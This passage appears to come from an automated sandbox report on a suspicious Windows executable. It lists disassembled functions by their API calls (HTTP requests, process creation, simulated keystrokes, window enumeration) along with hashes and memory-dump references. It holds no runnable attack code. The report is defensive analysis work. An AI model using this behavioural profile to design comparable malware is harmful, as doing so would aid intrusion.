                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                        • String ID:
                                                        • API String ID: 2156557900-0
                                                        • Opcode ID: 37c4aaa9c41989ce77c255de62059dce5d9a617a42d853292f33c88a5c5bedc1
                                                        • Instruction ID: b9c7e302073115d337de27b1093e4928a18a79b3e88f668f1e4e5dcf035afe7b
                                                        • Opcode Fuzzy Hash: 37c4aaa9c41989ce77c255de62059dce5d9a617a42d853292f33c88a5c5bedc1
                                                        • Instruction Fuzzy Hash: FC317CB9600214FBEF10DF58FD48B6A77A9FB65311F214129FA01D71A1EB749E80CB61
                                                        Function 007CFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007CFAA6
                                                        • OleUninitialize.OLE32(?,00000000), ref: 007CFB45
                                                        • UnregisterHotKey.USER32(?), ref: 007CFC9C
                                                        • DestroyWindow.USER32(?), ref: 008045D6
                                                        • FreeLibrary.KERNEL32(?), ref: 0080463B
                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00804668
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                        • String ID: close all
                                                        • API String ID: 469580280-3243417748
                                                        • Opcode ID: ee9b9bc388a2c04031db402299c0fc570b38be405e45d7f91ffc454075df1f33
                                                        • Instruction ID: cebaebd4fad7a27a15f254d07874ab33a229e5874ad95cf2b526b0b164bf20db
                                                        • Opcode Fuzzy Hash: ee9b9bc388a2c04031db402299c0fc570b38be405e45d7f91ffc454075df1f33
                                                        • Instruction Fuzzy Hash: 9CA14770301212CFDB69EF14C998F69B365FF15710F5042ADE90AAB2A2DB35AC56CF90
                                                        Function 0081A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnumChildWindows.USER32(?,0081A439), ref: 0081A377
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ChildEnumWindows
                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                        • API String ID: 3555792229-1603158881
                                                        • Opcode ID: 2d1d35de19a45ad6ec70c2c721d859edb2cabdedf46c67361fb13a42d2e253a8
                                                        • Instruction ID: e89b6988fab00d4b07538b30043194f751d1555216b3ff6693fafd3beb051a0e
                                                        • Opcode Fuzzy Hash: 2d1d35de19a45ad6ec70c2c721d859edb2cabdedf46c67361fb13a42d2e253a8
                                                        • Instruction Fuzzy Hash: A2918131602609EACB0CDFA0C445BEDFBB8FF04304F548129E95AE7251DB35A9D9CB91
                                                        Function 0084B351 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 199windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindow.USER32(00ED5230), ref: 0084B3EB
                                                        • IsWindowEnabled.USER32(00ED5230), ref: 0084B3F7
                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0084B4DB
                                                        • SendMessageW.USER32(00ED5230,000000B0,?,?), ref: 0084B512
                                                        • IsDlgButtonChecked.USER32(?,?), ref: 0084B54F
                                                        • GetWindowLongW.USER32(00ED5230,000000EC), ref: 0084B571
                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0084B589
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                        • String ID: 0R
                                                        • API String ID: 4072528602-1916035689
                                                        • Opcode ID: d43a86f3e334184e9d42cd82f356b2f3bc0d8d28ef57bdb60024ed3929ac342c
                                                        • Instruction ID: 12b0876320180ed2628dac7f203cc54ace12373ccddcbcaa9c67233d950b3098
                                                        • Opcode Fuzzy Hash: d43a86f3e334184e9d42cd82f356b2f3bc0d8d28ef57bdb60024ed3929ac342c
                                                        • Instruction Fuzzy Hash: C1718C38605208EFDB249F95C894FBABBB9FF1A300F144069EA45D73A2C731E951CB55
                                                        Function 007C2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowLongW.USER32(?,000000EB), ref: 007C2EAE
                                                          • Part of subcall function 007C1DB3: GetClientRect.USER32(?,?), ref: 007C1DDC
                                                          • Part of subcall function 007C1DB3: GetWindowRect.USER32(?,?), ref: 007C1E1D
                                                          • Part of subcall function 007C1DB3: ScreenToClient.USER32(?,?), ref: 007C1E45
                                                        • GetDC.USER32 ref: 007FCD32
                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007FCD45
                                                        • SelectObject.GDI32(00000000,00000000), ref: 007FCD53
                                                        • SelectObject.GDI32(00000000,00000000), ref: 007FCD68
                                                        • ReleaseDC.USER32(?,00000000), ref: 007FCD70
                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007FCDFB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                        • String ID: U
                                                        • API String ID: 4009187628-3372436214
                                                        • Opcode ID: acacb12621dc2c98860aa812375b240f0b5cb98157ea4b02e1c354701b5d99ae
                                                        • Instruction ID: 7b12fa4c8ff04fcb4ce1716830882a851000b20a2c0e62a5242b95ca1821d40a
                                                        • Opcode Fuzzy Hash: acacb12621dc2c98860aa812375b240f0b5cb98157ea4b02e1c354701b5d99ae
                                                        • Instruction Fuzzy Hash: 8671C03550020DDFCF269F64C984ABA7BB5FF49320F14427EEE55AA3A6C7388841DB61
                                                        Function 00831A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00831A50
                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00831A7C
                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00831ABE
                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00831AD3
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00831AE0
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00831B10
                                                        • InternetCloseHandle.WININET(00000000), ref: 00831B57
                                                          • Part of subcall function 00832483: GetLastError.KERNEL32(?,?,00831817,00000000,00000000,00000001), ref: 00832498
                                                          • Part of subcall function 00832483: SetEvent.KERNEL32(?,?,00831817,00000000,00000000,00000001), ref: 008324AD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                        • String ID:
                                                        • API String ID: 2603140658-3916222277
                                                        • Opcode ID: 9ffa4c3583fcd7f7f14de1769f06b43e0757e26af6138cc4d79e9d72cca52976
                                                        • Instruction ID: 4e94a9ea1a0517f37c3d87dfc5485c35d1a204b52c72c196871151193cf311bf
                                                        • Opcode Fuzzy Hash: 9ffa4c3583fcd7f7f14de1769f06b43e0757e26af6138cc4d79e9d72cca52976
                                                        • Instruction Fuzzy Hash: A84179B1501218BEEF119F60CC89FBABBACFB49754F00412AFA05DA141EB749E408BE0
                                                        Function 008462CD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008462EC
                                                        • GetWindowLongW.USER32(00ED5230,000000F0), ref: 0084631F
                                                        • GetWindowLongW.USER32(00ED5230,000000F0), ref: 00846354
                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00846386
                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008463B0
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 008463C1
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008463DB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageSend
                                                        • String ID: 0R
                                                        • API String ID: 2178440468-1916035689
                                                        • Opcode ID: b9da3ce56864ebc7e5a8e32cdc883362d0d986078af43a77f2343ba5aa629908
                                                        • Instruction ID: b30edfe52630a56cc5b3602c7ff5bbe3e356f037a95cfa2bdea35080df34ed1f
                                                        • Opcode Fuzzy Hash: b9da3ce56864ebc7e5a8e32cdc883362d0d986078af43a77f2343ba5aa629908
                                                        • Instruction Fuzzy Hash: A931EE38644299AFDB20CF18DC84F5937E1FB5A714F1901A9F601DB2B2DB71A8A0DB52
                                                        Function 00838C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0084F910), ref: 00838D28
                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0084F910), ref: 00838D5C
                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00838ED6
                                                        • SysFreeString.OLEAUT32(?), ref: 00838F00
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                        • String ID:
                                                        • API String ID: 560350794-0
                                                        • Opcode ID: 00eca7e0b2823461fb1b49545806edebd59c2ad7c6e8a29a75df24d4dd499be5
                                                        • Instruction ID: 4964ece23f6b717636a90b7cd02a2a9d7fecdbd6ae42d0ee38501558b41613ea
                                                        • Opcode Fuzzy Hash: 00eca7e0b2823461fb1b49545806edebd59c2ad7c6e8a29a75df24d4dd499be5
                                                        • Instruction Fuzzy Hash: 65F10871A00209EFDB14DF94C888EAEB7B9FF85314F108498F905EB251DB75AE45CB90
                                                        Function 0083F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0083F6B5
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0083F848
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0083F86C
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0083F8AC
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0083F8CE
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0083FA4A
                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0083FA7C
                                                        • CloseHandle.KERNEL32(?), ref: 0083FAAB
                                                        • CloseHandle.KERNEL32(?), ref: 0083FB22
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                        • String ID:
                                                        • API String ID: 4090791747-0
                                                        • Opcode ID: d48ccded8cb5401d1a143eecd140e62743e5baa20f9374c25a9361e0edcc6db6
                                                        • Instruction ID: 604f705eb7973b0ef7e54fa6eaa187ebe4c8a0818a1d2fedeb676db3e5c11f83
                                                        • Opcode Fuzzy Hash: d48ccded8cb5401d1a143eecd140e62743e5baa20f9374c25a9361e0edcc6db6
                                                        • Instruction Fuzzy Hash: 23E1AF31604241EFCB14EF24C885B6ABBE1FF89314F14856DF9998B2A2DB34DC45CB92
                                                        Function 00824CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0082466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00823697,?), ref: 0082468B
                                                          • Part of subcall function 0082466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00823697,?), ref: 008246A4
                                                          • Part of subcall function 00824A31: GetFileAttributesW.KERNEL32(?,0082370B), ref: 00824A32
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00824D40
                                                        • _wcscmp.LIBCMT ref: 00824D5A
                                                        • MoveFileW.KERNEL32(?,?), ref: 00824D75
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                        • String ID:
                                                        • API String ID: 793581249-0
                                                        • Opcode ID: 60a292ac7b94e986eb2408ce8f1820e6dcddfc2930187b95f5b3bed340e928ca
                                                        • Instruction ID: 010fe31a4ee9b30569433569c9e57f08ee3cf4ac4bc58bd4c4715f7b892799a5
                                                        • Opcode Fuzzy Hash: 60a292ac7b94e986eb2408ce8f1820e6dcddfc2930187b95f5b3bed340e928ca
                                                        • Instruction Fuzzy Hash: EC5163B21083959BC724DB64DC85DDB73ECEF84350F40192EF28AD3152EE35A589CB66
                                                        Function 007C2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 007FC2F7
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007FC319
                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007FC331
                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 007FC34F
                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007FC370
                                                        • DestroyIcon.USER32(00000000), ref: 007FC37F
                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007FC39C
                                                        • DestroyIcon.USER32(?), ref: 007FC3AB
                                                          • Part of subcall function 0084A4AF: DeleteObject.GDI32(00000000), ref: 0084A4E8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                        • String ID:
                                                        • API String ID: 2819616528-0
                                                        • Opcode ID: 9b7513c7124af0b4ef3327e40ebe4f0395a4dac04ee617070fea7445f30b3c55
                                                        • Instruction ID: 3899e968fc4a8e6c151c32d064a246009dc18b81e681f505c26d41d85ec7da07
                                                        • Opcode Fuzzy Hash: 9b7513c7124af0b4ef3327e40ebe4f0395a4dac04ee617070fea7445f30b3c55
                                                        • Instruction Fuzzy Hash: 79516974600209EFDB24DF68CC45FAA7BA5FB18350F10452DFA02D72A1EB78AC91DB61
                                                        Function 0081966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0081A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0081A84C
                                                          • Part of subcall function 0081A82C: GetCurrentThreadId.KERNEL32 ref: 0081A853
                                                          • Part of subcall function 0081A82C: AttachThreadInput.USER32(00000000,?,00819683,?,00000001), ref: 0081A85A
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0081968E
                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008196AB
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 008196AE
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 008196B7
                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008196D5
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008196D8
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 008196E1
                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008196F8
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008196FB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                        • String ID:
                                                        • API String ID: 2014098862-0
                                                        • Opcode ID: b69a69b996274e415dea1567f70fbaf52b593a1ad163468caa0208e32b1dfb6a
                                                        • Instruction ID: 02470b93763a9a71bab0072ccb5913ce93a9ed79bb5602e1953132cef96d5c4e
                                                        • Opcode Fuzzy Hash: b69a69b996274e415dea1567f70fbaf52b593a1ad163468caa0208e32b1dfb6a
                                                        • Instruction Fuzzy Hash: BE11E1B5910218BEF6106F64DC89FAA3B6DFF4D755F110429F344AB0A1C9F26C50DAA4
                                                        Function 00818921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0081853C,00000B00,?,?), ref: 0081892A
                                                        • HeapAlloc.KERNEL32(00000000,?,0081853C,00000B00,?,?), ref: 00818931
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0081853C,00000B00,?,?), ref: 00818946
                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,0081853C,00000B00,?,?), ref: 0081894E
                                                        • DuplicateHandle.KERNEL32(00000000,?,0081853C,00000B00,?,?), ref: 00818951
                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0081853C,00000B00,?,?), ref: 00818961
                                                        • GetCurrentProcess.KERNEL32(0081853C,00000000,?,0081853C,00000B00,?,?), ref: 00818969
                                                        • DuplicateHandle.KERNEL32(00000000,?,0081853C,00000B00,?,?), ref: 0081896C
                                                        • CreateThread.KERNEL32(00000000,00000000,00818992,00000000,00000000,00000000), ref: 00818986
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                        • String ID:
                                                        • API String ID: 1957940570-0
                                                        • Opcode ID: 3566d3b7af40ea6e99b46116a62c7307e225a54b57a389847931dfdf9735cfd7
                                                        • Instruction ID: 9b74ec8b4ea926acdc5dc4cfce7ca3c2d80b4d385d0a8687950f8a3b6dbe75d4
                                                        • Opcode Fuzzy Hash: 3566d3b7af40ea6e99b46116a62c7307e225a54b57a389847931dfdf9735cfd7
                                                        • Instruction Fuzzy Hash: 5701ACB9640304FFE611ABA5DC49F673BACFB89711F404425FB05DB191CA749800CA20
                                                        Function 00839B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                        • API String ID: 0-572801152
                                                        • Opcode ID: 79de19d1150837414eaa41fd653b453718c88dd57a6b54079417f7e90383c8c0
